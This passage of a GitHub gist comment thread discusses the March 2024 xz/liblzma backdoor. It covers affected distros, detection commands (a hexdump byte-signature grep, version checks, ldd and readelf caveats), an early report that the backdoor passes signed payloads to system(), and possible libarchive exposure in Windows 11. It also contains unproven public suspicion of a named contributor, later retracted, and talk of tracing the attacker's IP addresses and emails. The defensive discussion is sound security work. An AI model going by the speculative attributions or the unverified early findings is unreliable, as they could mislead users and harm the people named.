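# Hypothetical helper (not part of the real build script): evaluates only
# the single condition quoted above.
#   $1 = source directory, $2 = value to treat as RPM_ARCH
is_deb_or_rpm_build() {
    if test -f "$1/debian/rules" || test "x$2" = "xx86_64"; then
        return 0    # looks like a Debian or an x86_64 RPM package build
    fi
    return 1        # neither condition holds, e.g. a plain ./configure && make
}
```

For a plain source checkout with RPM_ARCH unset, is_deb_or_rpm_build . "$RPM_ARCH" returns non-zero, which is the sense in which this stage stays latent outside deb/rpm builds.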

@timtas

timtas commented Mar 30, 2024

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo) Sorry for being incorrect.

Well, as it stands now, only rpm and deb based distros are targeted, and neither Gentoo nor LFS falls into that category. As I said, I doubt very much any LFS user uses dpkg or rpm, and as xry111 said, we don't even use the systemd notification patch for openssh.

I can assure you 100% that xry111 would have had the chance to put this patch into the book, but he didn't, 100%. Do you need more proof?

@Z-nonymous

And even on systemd we don't patch sshd for systemd notification. The instruction is here:

https://www.linuxfromscratch.org/blfs/view/systemd/postlfs/openssh.html

We just tell people to download the upstream release and build it, w/o patching.

Yes there's multiple layers for it to work; many requirements in many places. Maybe it's targeting more specific systems than initially thought.

Still, the backdoor vector is ssh (openssl), xz/crc, systemd, where you made contributions.

I can't see PR86 anymore; it seemed LGTM to me, not being familiar with the code, but the detected bad actor on the xz package approved some changes to the crc code, while the crc code seems to be used here for the attack.
One can put forward the hypothesis (which can't be proven) that it could well have been to get you in, and that you would only put further code in there later.

@StefanCristian

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo) Sorry for being incorrect.

No, the attacker's target were deb and rpm distros, since they're mainly the ones who patched SSHD for systemd-notifications.

Read https://www.openwall.com/lists/oss-security/2024/03/29/4

The source-based distros are the main enemies here for the attackers, because they're the ones most prone to find these problems. Thanks to @xry111 's contributions in these areas the systems will be much more hardened from now on.

Your accusations are quite dubious, since we're talking about an anonymous attacker in cahoots with a well-known & public contributor.
We can very well ask about your interest in keeping these unfounded accusations alive; it feels like your intentions are less than noble.

@xry111

xry111 commented Mar 30, 2024

I can't see PR86 anymore

https://paste.mozilla.org/ynf2jvsh for auditors. I've not modified a thing since it was approved.

@Z-nonymous

Z-nonymous commented Mar 30, 2024

I cannot. The PR was reviewed and merged by @yuwata.

This page even says: xry111 authored and yuwata committed on May 10, 2023.

I know you cannot merge, but you can commit.
I saw @yuwata merge it along with some other commits.

Maybe he can tell what he thinks of changing a function that's supposed to be pure into a regular function.

@Ninpo

Ninpo commented Mar 30, 2024

And even on systemd we don't patch sshd for systemd notification. The instruction is here:
https://www.linuxfromscratch.org/blfs/view/systemd/postlfs/openssh.html
We just tell people to download the upstream release and build it, w/o patching.

Yes there's multiple layers for it to work; many requirements in many places. Maybe it's targeting more specific systems than initially thought.

Still, the backdoor vector is ssh (openssl), xz/crc, systemd, where you made contributions.

I can't see PR86 anymore; it seemed LGTM to me, not being familiar with the code, but the detected bad actor on the xz package approved some changes to the crc code, while the crc code seems to be used here for the attack. One can put forward the hypothesis (which can't be proven) that it could well have been to get you in, and that you would only put further code in there later.

I'd pay good money if you'd shut up

@xry111

xry111 commented Mar 30, 2024

I cannot. The PR was reviewed and merged by @yuwata.
This page even says: xry111 authored and yuwata committed on May 10, 2023.
I know you cannot merge, but you can commit.
I saw @yuwata merge it along with some other commits.

Maybe he can tell what he thinks of changing a function that's supposed to be pure into a regular function.

Because it isn't supposed to be pure (in GNU C).

The entire systemd project relies on GNU extensions so non-GNU compilers just won't work. Please don't quote specs from other compilers.

@Z-nonymous

Ok, so I'll apologize here, for just coming with suspicions instead of actual proofs. As one said I should have asked questions for some of the details, and my attitude was not correct.

@kbahey

kbahey commented Mar 30, 2024

Does anyone know if Ubuntu 22.04 Server is affected, or what command I could run to know if I am affected? I'm not familiar with detecting installed library versions.

Like you, I am also running 22.04 LTS.

I think it is not affected, based on the following:

First:

$ dpkg -l | grep lzma
ii  liblzma5:amd64 5.2.5-2ubuntu1

The version of xz is 5.2.5. The exploit was first introduced in 5.6.0.

Second:

if hexdump -ve '1/1 "%.2x"' /lib/x86_64-linux-gnu/liblzma.so.5 | 
grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then  
  echo "Probably vulnerable"
else 
  echo "Likely not vulnerable"
fi

This shell script shows that the library does not have the exploit's malicious function signature.
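
The version comparison in the first step can be sketched as a small helper. This is only an illustration: the function name is_backdoored_xz_version is hypothetical, and it checks nothing but whether the upstream part of a version string is 5.6.0 or 5.6.1, the two releases named at the top of this gist.

```shell
# Hypothetical helper: succeeds only when the version string is upstream
# 5.6.0 or 5.6.1, optionally followed by a "-revision" packaging suffix.
is_backdoored_xz_version() {
    case "$1" in
        5.6.0|5.6.0-*|5.6.1|5.6.1-*) return 0 ;;
        *) return 1 ;;
    esac
}
```

On a Debian-style system it could be fed with is_backdoored_xz_version "$(dpkg-query -W -f='${Version}' liblzma5)". Packaging version strings differ between distros, so treat the result as a hint rather than proof either way.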

One reason I stay with LTS releases only is to reduce the amount of change in a given time period.

@schkwve

schkwve commented Mar 30, 2024

I know You can not merge but you can commit.

That's how contributing works though... You fork a repository, commit to the forked repository, and open a PR (ask the original repository maintainers to merge the two branches together).

@dguglielmi

dguglielmi commented Mar 30, 2024

Lasse Collin has published a page: https://tukaani.org/xz-backdoor/

I think he spotted something else targeting cmake builds (in future)

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=f9cf4c05edd14dedfe63833f8ccbe41b55823b00

@duracell

why does the gist push updating so hard when there is so much unknown? To me it sounds like the only sure shot for the moment is to reinstall with downgraded two years old xz and stop using patched opensshd. Unless you weren't affected, which most people weren't (quick check: run ldd $(which sshd) and see if liblzma is included, for me it's not, and xz --version is below 5.6 even though i'm pretty bleeding edge)

Be careful with ldd, read "Please do not use ldd on untrusted binaries" from the gist. There is a detect.sh script which should be used instead.

@xry111

xry111 commented Mar 30, 2024

why does the gist push updating so hard when there is so much unknown? To me it sounds like the only sure shot for the moment is to reinstall with downgraded two years old xz and stop using patched opensshd. Unless you weren't affected, which most people weren't (quick check: run ldd $(which sshd) and see if liblzma is included, for me it's not, and xz --version is below 5.6 even though i'm pretty bleeding edge)

Be careful with ldd, read "Please do not use ldd on untrusted binaries" from the gist. There is a detect.sh script which should be used instead.

But the script invokes ldd too :(

# find path to liblzma used by sshd
path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"

However, I don't know whether in this case we may consider sshd "trusted" or not (liblzma.so is definitely untrusted).

We can use readelf -d /usr/sbin/sshd, which will show libsystemd if the systemd-notify patch is used. Note that running readelf -d on untrusted binaries is also dangerous (the Binutils maintainers say it's unsafe to do so w/o sandboxing), but we may consider sshd trusted here (liblzma.so is definitely untrusted)...
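
One way to sidestep the ldd question, as a sketch under assumptions rather than a vetted detector: if sshd is already running, the kernel lists its mapped libraries in /proc/<pid>/maps, and reading that file neither executes nor parses the binary. The helper name liblzma_from_maps is invented here, and it assumes the usual Linux maps layout in which the sixth whitespace-separated field is the path.

```shell
# Hypothetical helper: print each distinct liblzma path found in a
# /proc/<pid>/maps-style file given as $1 (prints nothing if none is mapped).
liblzma_from_maps() {
    awk '$6 ~ /\/liblzma\.so/ { print $6 }' "$1" | sort -u
}
```

Run as root, something like liblzma_from_maps "/proc/$(pgrep -o -x sshd)/maps" would print the library path for the oldest sshd process; empty output means liblzma is not mapped into that process.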

@Z-nonymous

Z-nonymous commented Mar 30, 2024

That's how contributing works though... You fork a repository, commit to the forked repository, and open a PR (ask the original repository maintainers to merge the two branches together).

Yes, I know. I only checked some PRs/commits, and some of the same group of people seem to approve each other's PRs, from random incoming bugs, but they might very well be legit anyway. I have seen mostly good commits and PRs anyway. But it's taking a huge amount of time.

So for now I'm assuming I'm completely wrong, and I was paranoid. I'll try to spend proper time to review, or leave it to each maintainer to check code.

Again I apologize for the inappropriate conduct I had.

@Baadvo

Baadvo commented Mar 30, 2024

@duracell

But the script invokes ldd too :(

# find path to liblzma used by sshd
path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"

What? That's odd, I looked at a detect script which didn't use ldd. Sorry, then I mixed it up with this one. :(
Thanks for the clarification!

@vlad-ivanov-name

Regarding this signature:

f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410

Has anyone been able to actually confirm that this function/binary includes the functionality described in the report? I'm looking at a matching binary and the function that starts with those bytes just chooses different implementation of CRC calculation based on the available instruction set, for which it does indeed call CPUID.

The report also claims some symbols were obfuscated in 5.6.1 but the symbol table looks identical with 5.6.0

@everything411

Be careful with ldd, read "Please do not use ldd on untrusted binaries" from the gist. There is a detect.sh script which should be used instead.

Note that the detect.sh script also uses ldd.

path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"

Attacking ldd needs some specific conditions. See https://sourceware.org/bugzilla/show_bug.cgi?id=22851.

Anyway, according to some current analysis of the backdoor, there is no evidence that the backdoored binary file can attack ldd.

So it seems that it's just ok to use ldd here.

@thesamesam
Author

thesamesam commented Mar 30, 2024

Please be patient if I missed anything overnight, as I am just waking up and catching up to many messages on IRC etc.

@AN4364364 Thank you for asking politely. #tukaani on IRC before this incident was a very small, cosy community with about 10 members. I have been a member of the channel for a few years and I was around when the project switched from self-hosted -> github. I followed the Tukaani org and starred the gh repo when it moved and I guess it happened at that point.

My experience is different from the Fedora maintainer as I didn't receive any emails or anything like that encouraging me to update quickly, but then again, we updated quickly by ourselves. Or maybe I didn't receive encouragement because the script maybe checks just for rpm/deb. I don't know.

@LaRevoltage

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo) Sorry for being incorrect.

No, the attacker's target were deb and rpm distros, since they're mainly the ones who patched SSHD for systemd-notifications.

Read https://www.openwall.com/lists/oss-security/2024/03/29/4

The source-based distros are the main enemies here for the attackers, because they're the ones most prone to find these problems. Thanks to @xry111 's contributions in these areas the systems will be much more hardened from now on.

Your accusations are quite dubious, since we're talking about an anonymous attacker in cahoots with a well-known & public contributor. We can very well ask about your interest in keeping these unfounded accusations alive; it feels like your intentions are less than noble.

I don't think heating this thread up with backwards accusations is great.
Also note that OP says multiple times that he does not want to blame anyone because he may be wrong, and he is only conducting his own research, which I believe is a good thing to do.

@NuLL3rr0r

1000059814

@AN4364364

Thank you thesamesam for the response

also to @everything411

We cannot even determine whether Jia Tan is an individual person or a hacker group.

Fake name and VPN ip address cannot indicate any real information about the hacker(s) behind the account.

If people want to withhold the IP addresses they have due to some moral belief about that category of previously-public data, I have no argument for that. But if people truly believe the IP address has zero value to ongoing efforts, that is factually wrong. Other parties hold data that may cross over with that user's IP address history (even accounting for false positives and how VPNs work).

Even if it's a, "I'll only give this privately to people who can positively identify themselves and prove they won't act like some Reddit user", that would be helpful and might mitigate the concerns around posting IP addresses publicly.

@everything411

everything411 commented Mar 30, 2024

We should treat all the information provided by Jia Tan himself as fake: fake name, fake IP address, fake country, fake timezone, etc.

What I said does not mean that these IP addresses are of no value, but I don't want anyone to blame other people just because of this very potentially fake information.

@LaRevoltage

Are there any research updates on the matter yet?

@pillowtrucker

$ echo hey everybody I worked on big commercial strong unix 25 years ago such as the fortress of security AIX and
#

@LaRevoltage

About the question of a single individual/group

It seems that the following identities were used in the process prior and after the backdoor implementation:
Hans Jansen
Jigar Kumar

Their GitHub accounts are nearly as active as the main Jia account, and were used occasionally for pressuring updates/making one or two commits

It implies that there was actually one person with main account as Jia, and other accounts as his fakes, since a group would have managed to make all 3 accounts active.

Source:
https://boehs.org/node/everything-i-know-about-the-xz-backdoor

@everything411

I just don't want anyone here to say something like "A Chinese/Asian name! These bad Chinese/Asian hackers!!".

That's wrong. It is very very likely that Jia Tan is just a fake identity. We cannot decide the one/ones behind Jia Tan.

@LaRevoltage

Following the IP question:
First of all, it's not guaranteed that the actor's OPSEC was ideal; in fact, no one's is. If at least one request was made with an unchanged IP, it is game over. We should also keep in mind that the IP is not the only trace to a person's real identity. If the actor didn't use a Whonix-like system to randomize browser data, then he can be traced to at least a country with the language data the browser sends.

Another aspect is that it is relatively easy to check if the IP belonged to a VPN node or a Tor node; the only exception to this is residential proxies/VPNs. So if the real IP was in fact used in some request, it wouldn't be very hard to parse and determine.

Emails usually contain the IP of mailing computer in headers, were those already checked?

@arizvisa

this gist thread is a shitshow. some posts are sensical, but then some are borderline paranoid and delusional. stop accusing accounts/countries/etc and then poking those things everywhere you find them. let the workers work.

@AN4364364

replying to the large image posted depicting the "Jia Cheong Tan" name

I found a couple open source software copyright notes that include that name that were indexed by search engines, indicating their code (libarchive contributions) made it into some products.

https://www.tcsag.de/fileadmin/user_upload/Information_Open-Source-Software_PES_Pro_IP.pdf
https://amazon-source-code-downloads.s3.amazonaws.com/eero/eero-embedded/eero-oss-attribution-latest.txt

With zero commentary on the true ethnic background of the bad actor, as I don't think that's their real name, I think "Jia Cheong Tan" and "Jia Tan" are useful search terms. Only because they had to have reused it when operating this persona.

@schkwve

schkwve commented Mar 30, 2024

As usual the actor will reveal itself by being most vocal about being innocent.

I personally doubt this would happen given the backdoor appears to be very sophisticated and has taken a lot of time to implement. Thus I can assume that the malicious actor is smart enough to not talk very much.

@snnn

snnn commented Mar 30, 2024

It makes me think of one thing: if you have ever heard of BinSkim and you add it to your build pipelines, then if anyone ever tries to insert a binary *.o file into your build like this, at least the malicious file needs to be compiled with the required security flags to prevent common attacks. It's better than doing nothing.

Also, as far as I know, no Linux distro runs any static code analysis when building their packages. Think about how it would be possible to insert clang-analyzer or CodeQL into rpm-build. And even if you do, nobody has enough time to address all the false positives.

On Windows we can use ApiValidator tool and a whitelist txt file to validate if all the Windows APIs the binary uses are in the whitelist. By doing this we can add a safety check in our build pipelines to warn us if a new API call was added. For example, if anyone ever tried to use CreateRemoteThread to create injections to another process, at least we could know that. However, it cannot handle indirect calls. Maybe some kind of static analysis could help us generate a list of parameters of all the GetProcAddress calls.

If your build environment is not in an isolated network, an attacker can host their payload in public cloud storage (like GitHub) and then download it during a build, which makes it hard to trace. For example, Python's manylinux docker images. Even if you have verified the crypto checksums when downloading open source software's source code (like libxcrypt), it doesn't prevent them from downloading more data during the build.

@arizvisa

@NuLL3rr0r: ftr, there's also the jiat75@gmail.com email account from the git logs, even mentioned by the OP, (which "sleuths" seem to have skipped over) that also has a corresponding GH account... but yeah, only internet stalkers care about that crap.

@waterkip

Are there any research updates on the matter yet?

I recommend keeping an eye open here: https://openwall.com/lists/oss-security/2024/03/

@waterkip

@NuLL3rr0r: ftr, there's also the jiat75@gmail.com email account from the git logs, even mentioned by the OP, (which "sleuths" seem to have skipped over) that also has a corresponding GH account... but yeah, only internet stalkers care about that crap.

I mailmapped the repo yesterday; these are the identities they have committed with:

Jia Cheong Tan <jiat0218@gmail.com> Jia Tan <jiat0218@gmail.com>
Jia Cheong Tan <jiat0218@gmail.com> Jia Tan <jiat75@gmail.com>
Jia Cheong Tan <jiat0218@gmail.com> jiat75 <jiat0218@gmail.com>

@MagpieRYL

I want to do some analysis, but I still lack samples, like the polluted "sshd" binary or .so files.
Can anyone offer one if you have it? APPRECIATE IT SO MUCH!

@DanielRuf

@arizvisa https://github.com/jiat75 is the "real" account, which committed all the time to xz.

You just don't see the PRs and commits there anymore, because the xz repo was disabled by GitHub.

@evokelektrique

Damn

@NuLL3rr0r

@snnn thanks for introducing BinSkim! I did not know about that.

I personally do agree with @arizvisa: let's stop accusing people with similar names or from a certain country, since I also highly doubt those identities are real identities, and the malicious actor is smart enough to steal someone else's identity.

@NuLL3rr0r

NuLL3rr0r commented Mar 30, 2024

@MagpieRYL you could install a Gentoo instance as I see they still have the ebuilds for 5.6.1 and the infected source archive on their mirrors, but masked it so no one can install it by mistake. But, you can unmask it deliberately and build it from source.

@gh-nate

gh-nate commented Mar 30, 2024

I'm watching some folks reverse engineer the xz backdoor, sharing some preliminary analysis with permission.

The hooked RSA_public_decrypt verifies a signature on the server's host key by a fixed Ed448 key, and then passes a payload to system().

It's RCE, not auth bypass, and gated/unreplayable. — https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

Multiple posts in a thread including ...

Apparently the backdoor reverts back to regular operation if the payload is malformed or the signature from the attacker's key doesn't verify.

Unfortunately, this means that unless a bug is found, we can't write a reliable/reusable over-the-network scanner. — https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowkezwz6g2q
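To make the "can't write a scanner" point concrete, here is a toy sketch of gated behaviour. It is not the backdoor's code: the real check is reported to be an Ed448 signature against a fixed public key, while this sketch substitutes an HMAC with a made-up secret purely because HMAC is in the Python standard library. All names here are hypothetical.

```python
import hashlib
import hmac

# Hypothetical stand-in secret. The real backdoor is reported to verify an
# Ed448 signature; HMAC is used here only as a stdlib substitute.
ATTACKER_KEY = b"known only to the attacker"


def normal_handler(request):
    """Stand-in for the unmodified code path."""
    return "normal: " + hashlib.sha256(request).hexdigest()[:8]


def hooked_handler(request):
    """Behave exactly like normal_handler unless the request carries a valid tag."""
    payload, tag = request[:-32], request[-32:]
    expected = hmac.new(ATTACKER_KEY, payload, hashlib.sha256).digest()
    if len(request) > 32 and hmac.compare_digest(tag, expected):
        # The real code reportedly hands the payload to system() at this point.
        return "hidden path taken"
    # Malformed or unsigned input: fall back to regular operation.
    return normal_handler(request)


if __name__ == "__main__":
    probe = b"anything a scanner might send"
    # Without the key, a probe sees identical behaviour from both handlers.
    print(hooked_handler(probe) == normal_handler(probe))
```

Since every request that lacks a valid tag takes the normal path, a remote probe without the attacker's key has nothing to observe, which matches the conclusion quoted above.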

@christoofar

How many Docker/LXC images that pulled bleeding-edge packages somehow managed to incorporate this in the last month, I wonder, because the tarball was pulled. I have already seen Go programmers who use cgo raise eyebrows, because they often take the shortcut of building from a tarball to make the whole build easier.

@smallxu038

This command prints the xz version inside each Docker container, so you can check whether any of them has an affected version (5.6.0 or 5.6.1).

docker ps -aq | xargs -I {} docker exec {} sh -c 'xz --version || echo "xz not found"' 2>/dev/null
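The output of the command above still has to be read by eye. A minimal sketch for classifying each result, assuming the usual `xz (XZ Utils) X.Y.Z` first line of `xz --version`; the function name and the three labels are made up for illustration.

```python
import re

# Versions named in this gist as carrying the backdoor.
AFFECTED_VERSIONS = {"5.6.0", "5.6.1"}


def classify_xz_output(output):
    """Classify the text printed by `xz --version` (or the 'xz not found' fallback)."""
    match = re.search(r"xz \(XZ Utils\) (\d+\.\d+\.\d+)", output)
    if match is None:
        return "unknown"
    return "affected" if match.group(1) in AFFECTED_VERSIONS else "not affected"


if __name__ == "__main__":
    for sample in ("xz (XZ Utils) 5.6.1\nliblzma 5.6.1\n", "xz not found\n"):
        print(repr(sample), "->", classify_xz_output(sample))
```

"affected" here only refers to the version number; as noted elsewhere in this thread, more conditions have to hold for a system to be exploitable.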

Clearly, this incident has deepened prejudice and discrimination against Chinese people. I would rather believe that it is a pseudonym for an organization, not a real person :(

@DanielRuf

@smallxu038 the origin of the person doesn't matter. And only fools think that it is connected to a specific country.

Even with the version you need more things (see the requirements from the Gist) to be exploitable.

Some people seem to make progress with reverse engineering the payload. Currently there is the assumption that the backdoor allows Remote Code Execution (RCE). See https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b for more details.

@wryMitts

wryMitts commented Mar 30, 2024

Windows 11 may be in scope.

Libarchive reviewing Jia Tan commits starting from 2021:
libarchive/libarchive#2103
Windows 11 added Libarchive in 23h2 (released in late 2023/early 2024):
https://support.microsoft.com/en-us/topic/november-14-2023-kb5032190-os-builds-22621-2715-and-22631-2715-f9e3e13c-5e98-42c2-add8-f075841ca812

New! This update adds native support for reading additional archive file formats using the libarchive open-source project, such as:
...
tar.xz
...

The DLL and support for opening tar.xz are also observed in earlier versions of Windows 11, including 22H2.

@NuLL3rr0r

Windows 11 may be in scope.

Libarchive reviewing Jia Tan commits starting from 2021: libarchive/libarchive#2103 Windows 11 added Libarchive in 23h2 (released in late 2023/early 2024): https://support.microsoft.com/en-us/topic/november-14-2023-kb5032190-os-builds-22621-2715-and-22631-2715-f9e3e13c-5e98-42c2-add8-f075841ca812

New! This update adds native support for reading additional archive file formats using the libarchive open-source project, such as:
...
tar.xz
...

That would make billions of devices vulnerable!! 🤯

@smallxu038

@smallxu038 the origin of the person doesn't matter. And only fools think that it is connected to a specific country.

Even with the version you need more things (see the requirements from the Gist) to be exploitable.

Some people seem to make progress with reverse engineering the payload. Currently there is the assumption that the backdoor allows Remote Code Execution (RCE). See https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b for more details.

Yes, what we need to consider now is how to solve security issues and how to prevent such situations from happening again, rather than attacking people from a certain region. Rational people still make up the majority. This attacker is just one step away from causing greater damage, I am still paying attention to this event, thank you for providing the information.

@DanielRuf

@NuLL3rr0r there is probably no backdoor. Otherwise we would know more.

I would not jump to conclusions here and assume that every touched project has this backdoor. Currently it's about xz version 5.6.0 and 5.6.1.

Other projects and commits have to be checked before anyone can say for sure, if other projects also have malicious code.

@spawel22

@NuLL3rr0r there is probably no backdoor. Otherwise we would know more.

You need to check it first. Wild guessing means nothing.

@DanielRuf

@spawel22 that's what "probably" implies. And my last sentence:

Other projects and commits have to be checked before anyone can say for sure, if other projects also have malicious code.

Check / verify first, post facts afterwards.

@wryMitts

wryMitts commented Mar 30, 2024

Windows 11 22H2 22621.3007 may contain Jia Tan code. See below.
Windows 11 23H2 may contain more; not tested yet.

Windows 10 22h2

Windows 10 22H2 19045.4170 has libarchive dll, but may be too old, before Jia Tan added commits:
C:\Windows\WinSxS\amd64_libarchive-internal ... (need to add in your UUID in path if different)
Or C:\Windows\System32\archiveint.dll
Version 3.5.1.0

Oldest Jia Tan commit to libarchive is 2021, but none of those commits are in 3.5.1
libarchive/libarchive@v3.5.0...v3.5.1
3.5.0 released in 2020. Only small bugfixes, nothing from Jia since then.
image

Windows 11 22h2

Commits from Jia Tan present!! libarchive/libarchive@v3.5.1...v3.6.2
Code is in use to open tar.xz archives! See link
Windows 11 22H2 22621.3007 contains libarchive 3.6.2.0:
image

Contains proper strings to match dll version to github version as a sanity check

$ strings archiveint.dll | grep libarchive
libarchive 3.6.2

Xz support compiled in by Microsoft:

$ strings archiveint.dll | grep xz
Can't allocate data for xz decompression
xz initialization failed(%d)
No memory for xz decompression
Truncated xz file body
xz data error (error %d)
xz unknown error %d
xz premature end of stream
archive_write_add_filter_xz
.tar.xz
archive_read_support_compression_xz
archive_read_support_filter_xz
archive_write_add_filter_xz
archive_write_set_compression_xz
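For those without `strings` and `grep` at hand (e.g. on Windows itself), here is a rough Python equivalent of the two checks above. It is a sketch that only looks at ASCII strings, so anything stored as UTF-16 in the DLL would be missed; the function names are made up for illustration.

```python
import re


def printable_strings(data, min_len=4):
    """Yield runs of printable ASCII at least min_len long, like the `strings` tool."""
    for match in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield match.group().decode("ascii")


def libarchive_versions(data):
    """Return the sorted 'libarchive X.Y.Z' version numbers embedded in data."""
    found = set()
    for text in printable_strings(data):
        found.update(re.findall(r"libarchive (\d+\.\d+\.\d+)", text))
    return sorted(found)


if __name__ == "__main__":
    # Synthetic bytes standing in for a DLL; read the real file with
    # open(path, "rb").read() instead.
    blob = b"\x00\x01libarchive 3.6.2\x00xz data error (error %d)\x00"
    print(libarchive_versions(blob))
    print([s for s in printable_strings(blob) if "xz" in s])
```

A version string only identifies which libarchive release was bundled; it says nothing about whether any commit in that release is malicious.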

Windows 11 23h2

No data available yet, come back later?

@chenrui333

it might be good to also call out this oss-fuzz PR, google/oss-fuzz#10667

@thesamesam
Author

I'm going to mention oss-fuzz & libarchive, with some commentary next to them, because a lot of people keep asking about them. Just going to eat first.

@wryMitts

wryMitts commented Mar 30, 2024

Windows 11 using Jia Tan xz code from libarchive

Initial info

In addition to this info

Windows 11 22H2 22621.3007 support for xz files
image

Windows 11 explorer.exe loads archiveint.dll only AFTER opening any .xz archive

image

@cculianu

I just don't want anyone here to say something like "A Chinese/Asian name! These bad Chinese/Asian hackers!!".

That's wrong. It is very very likely that Jia Tan is just a fake identity. We cannot decide the one/ones behind Jia Tan.

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

@cyclone-github

Simple script to detect if your linux distro is vulnerable to CVE-2024-3094
https://github.com/cyclone-github/scripts/blob/main/xz_cve-2024-3094-detect.sh
(This is a fixed version, with added features, of https://www.openwall.com/lists/oss-security/2024/03/29/4)

@FlyingFathead

FlyingFathead commented Mar 30, 2024

How can we prevent this from happening again in the future?

I'm not sure if this would work in practice, but perhaps there should be an automatic A/B / diff check for the tarball contents against the repository's contents and at least a warning flag alongside the package if the contents between the two aren't matching within a stated version number. It could give some early warning on something being off with the tarball.

Then again, if it's just a warning, most people would probably just ignore it anyway, and that approach might either not cover all scenarios, or make certain aspects over-complex. That being said, if tarball files can contain arbitrary contents that do not match the associated commit or tag in the repository, the discrepancy could be exploited maliciously for users relying on the integrity of those releases. There's a general security aspect to this that might have to be enforced from GitHub's end in the future.
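A rough sketch of what such a tarball-versus-repository check could look like, assuming the release tarball has already been extracted to one directory and the matching tag checked out to another. The function names are made up for illustration, and the result is a list for a human to review, not a verdict.

```python
import hashlib
from pathlib import Path


def tree_digests(root):
    """Map each file's path relative to root to the SHA-256 of its contents."""
    root = Path(root)
    return {
        path.relative_to(root).as_posix(): hashlib.sha256(path.read_bytes()).hexdigest()
        for path in sorted(root.rglob("*"))
        if path.is_file()
    }


def compare_trees(tarball_dir, checkout_dir):
    """Report files that exist only in the tarball or differ from the checkout."""
    tarball = tree_digests(tarball_dir)
    checkout = tree_digests(checkout_dir)
    only_in_tarball = sorted(set(tarball) - set(checkout))
    changed = sorted(
        path for path in tarball.keys() & checkout.keys()
        if tarball[path] != checkout[path]
    )
    return only_in_tarball, changed
```

Usage would be something like `only, changed = compare_trees("xz-extracted", "xz-git")` with both directory names being placeholders. Generated files such as `configure` will legitimately show up as tarball-only for autotools projects, so the lists need manual triage rather than an automatic pass/fail.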

The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.

... Which again made the exploit possible to begin with, and serves a reminder on how convenience tends to lead to lapses in security, and how the overall approach to that might need some serious re-evaluation, especially after major incidents like these.

Just my thoughts on this whole thing, feel free to chime in and/or correct me if I'm wrong.

@thesamesam
Author

I have my own thoughts about post-mortem but I plan on writing that up when we're out of the storm. Not that people need to wait on me, ofc. Just think: a) still in the heat of it; b) it's too soon to reflect properly and in a clear-headed way yet.

@cw-alexcroteau

cw-alexcroteau commented Mar 30, 2024

@thesamesam "We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why."

Based on the latest information, it looks like an RCE (after verifying the key, it passes the payload to system() rather than bypassing the auth mechanism) rather than an auth bypass, though I haven't confirmed it myself: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

The sad thing is that it would not be possible to scan for it over the network, because an invalid key or malformed request makes the code fall back to regular operation.

@DoctorWho8

What a revolting development this is! I will probably update the three running Linux systems that might be affected.

@teyhouse

This is a very rough sketch but may help in detecting the lib inside Docker and Kubernetes (better to use Falco, your CNAPP, or whatever):
https://github.com/teyhouse/CVE-2024-3094

@thesamesam
Author

@cw-alexcroteau Thank you, I will assess.

@Sepero

Sepero commented Mar 30, 2024

NixOS devs are reporting that the liblzma patch is not applied, and therefore NixOS is not vulnerable to the sshd exploit

Source:
https://discourse.nixos.org/t/cve-2024-3094-malicious-code-in-xz-5-6-0-and-5-6-1-tarballs/42405/23

@DoctorWho8

I wonder if Slackware-15.0 and Slackware 64 15.0 are vulnerable?

@TheRsKing

if no port is open for ssh, so it was only accessible internally, it is unlikely that someone attacked me, right? (if ssh is the only case)

@cw-alexcroteau

cw-alexcroteau commented Mar 30, 2024

if no port is open for ssh, so it was only accessible internally, it is unlikely that someone attacked me, right? (if ssh is the only case)

@TheRsKing based on current knowledge, that's correct. The vulnerability would be triggered by a specific payload with a given public key being sent to an exposed sshd, it doesn't "phone home" to a C2 server.

@TebosBrime

How can we prevent this from happening again in the future? Look at the origin of this attack. The xz developer was working a lot, unpaid, and with health problems. The attacker noticed it and exploited the weak point in a human being. Meanwhile, society in general keeps sending billions of dollars to Microsoft, but nothing to such important projects as XZ. If we as a society do not help each other, this is bound to be repeated over and over again. My condolences to the xz developer. Good luck.

Not only that. I can also imagine that some developers would be tempted by money. Especially if the attacker is state-sponsored, this would definitely be a conceivable scenario that should be considered for the future.

@wryMitts

Review on libarchive 3.6.2 (Windows 11 affected) libarchive/libarchive@02cfa8a
dev quote is meaningful:

If not malicious, I'd say on track to be.

@thesamesam
Author

@wryMitts I will add a link to libarchive/libarchive#2103 where the review of possibly affected commits is being coordinated.

@zacanger

zacanger commented Mar 30, 2024

@smallxu038

This command can check whether Docker containers are running the affected version of xz.

docker ps -aq | xargs -I {} docker exec {} sh -c 'xz --version || echo "xz not found"' 2>/dev/null

Clearly, this incident has deepened prejudice and discrimination against Chinese people. I would rather believe that it is a pseudonym for an organization, not a real person :(

China has 1.4 billion people and some of the top tech companies and universities in the world. We all use Chinese code every day. So whether it's a pseudonym or not doesn't matter; if anyone's suddenly Sinophobic because of this, they were already Sinophobic, so I wouldn't worry about it.

@DoctorWho8

I wonder if Slackware-15.0 and Slackware 64 15.0 is vulnerable?

Unlikely based on what's been figured out so far, unless you manually installed a later version than is available in the repos, and also got systemd working.

@LaRevoltage

@thesamesam
Author

@LaRevoltage Already linked in the FAQ itself now.

@LaRevoltage

